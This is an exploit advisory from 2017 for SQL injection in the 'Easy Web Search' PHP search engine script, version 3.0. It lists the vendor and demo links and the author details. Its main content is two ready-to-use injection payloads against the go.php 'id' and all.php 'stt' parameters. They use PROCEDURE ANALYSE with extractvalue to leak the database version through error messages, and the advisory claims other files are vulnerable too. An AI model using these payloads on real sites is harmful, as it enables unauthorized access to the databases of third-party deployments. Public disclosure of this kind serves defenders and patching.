Easy Web Search 3 SQL Injection
Posted on 08 February 2017
# # # # # # Exploit Title: Easy Web Search - PHP Search Engine with Image Search and Crawling System Script v3.0 - SQL Injection # Google Dork: N/A # Date: 07.02.2017 # Vendor Homepage: http://nelliwinne.net/ # Software Buy: https://codecanyon.net/item/easy-web-search-php-search-engine-with-image-search-and-crawling-system/17574164 # Demo: http://demos.nelliwinne.net/EasyWebSearchDev/ # Version: 3.0 # Tested on: Win7 x64, Kali Linux x64 # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Mail : ihsan[@]ihsan[.]net # # # # # # SQL Injection/Exploit : # http://localhost/[PATH]/go.php?id=[SQL] # 99999'+Procedure+Analyse+(extractvalue(0,concat(0x27,0x496873616e2053656e63616e,0x3a,@@version)),0)-- - # http://localhost/[PATH]/all.php?q=&stt=[SQL] # 99999+Procedure+Analyse+(extractvalue(0,concat(0x27,0x496873616e2053656e63616e,0x3a,@@version)),0)-- - # Etc....Other files have vulnerabilities ... # # # # #